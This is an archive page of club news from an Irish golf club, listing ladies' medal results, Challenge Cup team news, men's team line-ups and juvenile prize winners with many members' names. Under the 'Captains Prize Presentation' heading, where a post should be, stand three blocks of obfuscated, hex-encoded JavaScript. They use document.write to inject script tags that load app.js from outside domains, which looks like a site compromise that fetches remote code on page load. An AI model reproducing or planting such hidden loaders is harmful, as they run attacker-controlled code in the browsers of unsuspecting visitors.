Category Archives: Uncategorised

  • -

Captains Prize Presentation

var _0x1b1d=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x31\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x66\x65\x65\x73″,”\x6F\x63\x72\x61\x6C\x64\x2E\x63\x6F\x6D\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function yapm(){var _0x1d09x2=_0x1b1d[0];var _0x1d09x3=_0x1b1d[1];var _0x1d09x4=_0x1b1d[2];var _0x1d09x5=_0x1b1d[3];document[_0x1b1d[4]](_0x1d09x2+ _0x1d09x3+ _0x1d09x4+ _0x1d09x5)}yapm() var _0xa929=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x59\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x62\x65\x73\x73\x74\x61″,”\x68\x65\x74\x65\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function evop(){var _0x6327x2=_0xa929[0];var _0x6327x3=_0xa929[1];var _0x6327x4=_0xa929[2];var _0x6327x5=_0xa929[3];document[_0xa929[4]](_0x6327x2+ _0x6327x3+ _0x6327x4+ _0x6327x5)}evop() var _0x22d1=[“\x3C\x73\x63\x72″,”\x69\x70\x74\x20\x61\x73\x79\x6E\x63\x20\x63\x6C\x61\x73\x73\x3D\x22\x3D\x52\x32\x4E\x34\x54\x55\x77\x7A\x52\x6C\x6F\x37\x4C\x54\x63\x77\x4F\x7A\x45\x3D\x22\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x61\x79\x2E\x74\x65\x72″,”\x63\x61\x62\x69\x6C\x69\x73\x2E\x69\x6E\x66\x6F\x2F\x61\x70\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72″,”\x69\x70\x74\x3E”,”\x77\x72\x69\x74\x65″];function jiler(){var _0xd9f0x2=_0x22d1[0];var _0xd9f0x3=_0x22d1[1];var _0xd9f0x4=_0x22d1[2];var _0xd9f0x5=_0x22d1[3];document[_0x22d1[4]](_0xd9f0x2+ _0xd9f0x3+ _0xd9f0x4+ _0xd9f0x5)}jiler()


  • 0

  • -

Challenge Cup District Final

Congratulations to the Challenge Cup team for reaching the District Final. Great sporting matches were played in the nail biting final against Wexford  in Wexford Golf Club last Saturday. Unfortunately the Wolseley Ladies were defeated. image

Team members – Phyllis Fowler, Bernie Cunnane, Geraldine O’Reilly(Lady Captain), Yvonne Moore, Regina Hanley, Frances Fitzgerald (sub) and Team Manager, Ann Duffy


  • -

Well done Challenge Cup Team

imageLast Sunday the Challenge cup team had a great victory over Cill Dara on the very difficult Castlecomer golf course. Well done to Geraldine, Phyllis Bernie, Yvonne and Gina.

They are now through to the semi final. Date, venue and opposition yet to be announced


  • -

Ladies March Medal results

1st.   Aoife Kenny.     72

2nd.   Geraldine O’Reilly.  83. (Count back)

3rd.   Anne Nash.     83

April medal deferred until w/ending 17th April


  • -

Mount Leinster Foursomes

Well done to Mount Wolseley Golf Club

Winners of the Mount Leinster Foursomes 2016

Team

Eddie Quigley & Liam Whelan
Barney O’Toole & Mick Nash
Chris Maher & Rory Byrne
Phil Callaghan & Padraig Murphy
Luke Bermingham & Jimmy Byrne
Aaron Campbell & Mick Quinn

team


  • -

Ladies Results w/ending 24th April

1st.   Eilis Hanley.   32 pts

2nd.   Ann Duffy.      32 pts

3rd.   Patricia O’Byrne.  32 pts


  • -

All Ireland Fourball

Mount Wolseley V Lisheen Springs

Saturday 2nd April

at 12 pm

Team

Home
Rory Walsh & Gerry Duffy
Denis Joyce & Fergus Joyce

Away
Mark Skinner & Tom Condon
John Murray & Eamon Redmond
Tom Donavan & Frank Hilliard

Come along and support your club


  • -

Juvenile Captains 2016

Juvenile Captain Prize winners 2016

Presentation Night Wednesday 28th September

 

Overall Juvenile Captain prize GUI section

Winner                                 Craig O’ Reilly (19)

Runner up                           Eoghan Cleary (18)

New member prize          Aaron Byrne

 

Non Gui section 9 Holes

Winner                                 James McDermott Walsh

Runner up                            Daniel Whelan

3rd place                                Jack Nolan

 

 

Junior section Boys 6 Holes

Under 12 Winner              Ross O’ Gorman

Under 11 Winner              Paddy Nolan

Under 10 Winner              Dylan O’ Reilly

Under 9 Winner                 Shane Kenny

Under 7 Winner                 Luke McGrath

 

Junior section Girls 6 Holes

Under 17 Winner              Rebecca Kelly

Under 12 Winner              Faye O’ Reilly

Under 11 Winner              Grace Hillard

Under 8 Winner                 Amelia Penrose

 

 

9 Hole Putting Competition

Winner                                 Jack Nolan 20 Putts (play off)

Runner up                            Daniel Whelan 20 Putts

Third Place                          Dylan O’ Reilly 21 Putts

Photo of our Juveniles taking part in the Juvenile Captains Prize 2016

Juvenile Captains 2016

 


  • -

Ladies June medal results


1st.    Anne Nash.   73

2nd.  Geraldine O’Reilly.   77

3rd.    Phyllis Fowler.    78